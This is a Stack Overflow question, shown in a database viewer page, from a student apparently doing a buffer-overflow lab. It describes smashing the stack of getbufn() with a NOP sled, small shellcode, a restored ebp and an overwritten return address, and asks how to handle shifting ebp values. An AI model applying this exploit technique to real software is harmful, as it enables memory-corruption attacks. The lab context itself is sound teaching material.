Databases
StackOverflow2013
Postsdbo
PONeed to exploit buffer overflow. Can't figure out how to uncorrupt the stack after executing exploit code?
Body
 

Note that there are some explanatory texts on larger screens.

plurals
  1. PONeed to exploit buffer overflow. Can't figure out how to uncorrupt the stack after executing exploit code?
    text
    copied!<p>Basically the function I am exploiting is this:</p> <pre><code>int getbufn() { char buf[512]; Gets(buf); return 1; } </code></pre> <p>When I run the main program the function executes 5 times and each time the location of buf changes and so does the location of %ebp. What I am supposed to do is place a specific hex value, lets say 0xFFFFFFFF, into a variable and the main program checks each time to see if that variable is there. If it is it executes again until all 5 times are done and the program exits quietly. </p> <p>The problem I am having is that right before the check for the hex value there is a check for another value that is constant, lets say 0x12345678. If I have corrupted 0x12345678 and it's not there, the program explodes on me. </p> <p>I have figured out that 0x12345678 is stored in -0x10(%ebp) so I know it is based off %ebp and I know the address of %ebp each time but I can only get the exploit to work the first time. I do this by basically nopsled-ing 496 bytes and the having this machine code in byte format:</p> <pre><code>mov 0xFFFFFFFF, %eax movl address old ebp, %ebp push correct return adress in function main ret </code></pre> <p>which ends up being 5 words and a byte for return long which I fill with 0x313131 to make it 6 words long. At this point my exploit string is 520 bytes long which is exactly how much the buffer is below %ebp and so I add on the address of old ebp and an address somewhere inside my nopsled overwriting the current value at %ebp as well as the return address for getbufn.</p> <p>The problem is when the program executes a 2nd time %ebp is in an address 0x10 lower than its previous address so my way of uncorrupting %ebp doesn't work and main detects that 0x12345678 is not at -0x10(%ebp). How do I uncorrupt %ebp?</p>
 

Querying!

 
Guidance
An individual column

Larger individual text columns get their own page to allow for proper reading.

SQuiL has stopped working due to an internal error.

If you are curious you may find further information in the browser console, which is accessible through the devtools (F12).

Reload